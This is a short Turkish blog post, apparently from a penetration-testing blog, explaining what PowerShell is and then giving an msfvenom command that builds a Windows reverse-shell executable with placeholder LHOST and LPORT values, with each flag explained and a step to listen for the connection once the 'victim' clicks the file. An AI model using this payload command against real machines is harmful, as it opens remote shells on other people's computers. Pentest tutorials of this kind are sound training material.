Windows Powershell Reverse Connect - Sızma

Merhabalar ,

Bugun Windows Powershell komut satırına nasıl sızabiliriz kısaca bahsedeceğim . Öncelikle Powershell nedir bir inceleyelim ..

PowerShell Nedir ;
Microsoft çıkartmış olduğu ürünler de sürekli olarak komut satırından ziyade grafiksel ara yüze yoğunlaşmıştır.Tabi ki bu, ürünlerde komut satırının olmadığı veya scripting uygulamalarının yapılmadığı anlamına gelmemektedir.Daha önceki ürünlerde Netsh,Windows Script Host(WSH),Windows Management Instrumentation(WMI) gibi komut yazım dilleri bulunmaktaydı.Ancak bunlar belirli bir yere kadar basit konfigürasyonlara destek verebiliyordu.Sunucular üzerinde daha gelişmiş ayarların yapılabilmesi için Microsoft, Windows PowerShell’i çıkardı. Windows PowerShell bir komut satırı uygulamasıdır.Komut satırı kullanıcıları ve script yazarlarına .NET Framework gücünü veren bir ortamıdır.

Adım 1 : İlk olarak terminalimizi açıyoruz ve aşağıdaki komutları yazıyoruz .

msfvenom -p windows/shell_reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f exe -a x86 --platform windows -o /root/Desktop/isim.exe

Peki buradaki parametreler nedir ?

1 ) -p Kullanılacak payload yazılır.

2 ) LHOST - Local makinanın ip adresi yazılır.

3 ) LPORT - Bağlantının hangi port üzerinden gelinmesi isteniyorsa port numarası yazılır .

4 ) -f Dosya formatı belirlenir

5 ) -a 64 Bit Mimarisindemi yada 32Bit Mimarisindemi çalışılacagı belirlenir.

6 ) --platforum hangi platformda çalışacagı belirlenir ( örnk : windows , linux , mac vb )

7 ) -o Dosyanın nereye oluşturulacagı belirlenir.
Adım 2 : Ve bağlantının gelmesi için belirlediğimiz portu dinlemeye alıyoruz. Kurban Tıkladıgı an bize reverse connect gelecek ve powershell komut satırına düşeceğiz . Ve bağlantı Geldi .
Güvenli Günler ,

Yorumlar

Bu blogdaki popüler yayınlar

MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme

Sızma Testi Senaryosu - Bölüm 1

Windows İşletim Sisteminde Yetki Yükseltme - 1